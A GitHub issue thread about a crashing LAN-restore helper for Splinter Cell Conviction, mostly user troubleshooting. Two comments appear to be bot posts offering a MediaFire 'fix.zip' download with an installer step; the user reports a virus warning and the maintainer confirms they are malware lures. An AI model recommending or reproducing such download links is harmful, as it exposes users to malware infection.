### ISSUE TITLE
scc_lan_helper.exe is crashing

### ISSUE THREAD

**Issue by PIRATx3** [Ododo/scc-lan-restore#7]
hello, so when i run scc_lan_helper.exe the black window is there for like a milisecond and just disappears, i think its safe to say it crashes but i really dont know the reason for this.
also just to make sure i ran the game afterwards but it says that ubisoft server isnt available just as it always does

i followed this video - https://www.youtube.com/watch?v=fv_MStYq4Fk

so i know that the black window is supposed to stay there, i will try this coop fix on my older pc to just to see if it works there, im using windows 10 on both of the machines

i will try to compile the python version too just in case

edit: tried it on my old pc which is so slow that i could barely see 2 lines of code being written before the black window closes, i wanted to read it if it meant opening the file a few times consecutively but those 2 lines seem to have appeared only the first time i ran the .exe, every time after that it was just the underscore character and the window closed

i will try the phyton method now

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by PIRATx3** [comment]
it says theres a virus in there

**Comment by PIRATx3** [comment]
and now it's blocked on mediafire

**Comment by PIRATx3** [comment]
HAHAHAHAHA IT WORKS

the python version works guys! or atleast now i no longer get that the ubisoft servers are not available and a new part of the menu appears, i will try this on the other pc and see if they can connect

**Comment by PIRATx3** [comment]
on the other pc the ubisoft server is not available screen is bypassed as well but when i run scc_lan_helper.py there are some errors that say access is denied, and the two pc's cant see each others matches, imma try to fix this when i wake up

**Comment by PIRATx3** [comment]
for anyone confused about the comments 
![virus splinter cell conviction fix](https://github.com/user-attachments/assets/ca430360-378a-4eb1-9d2e-6b4f0642f833)

**Comment by PIRATx3** [comment]
so i fixed the issues i had and now i can see the match the other pc created but i cant join it, i tried making the match on my pc too and the other pc can see it but when they try to join they cant either and it says something like the connection is not responding

**Comment by Ododo** [comment]
These were messages from bots aiming to spread malwares.
You should always check before downloading/running anything.
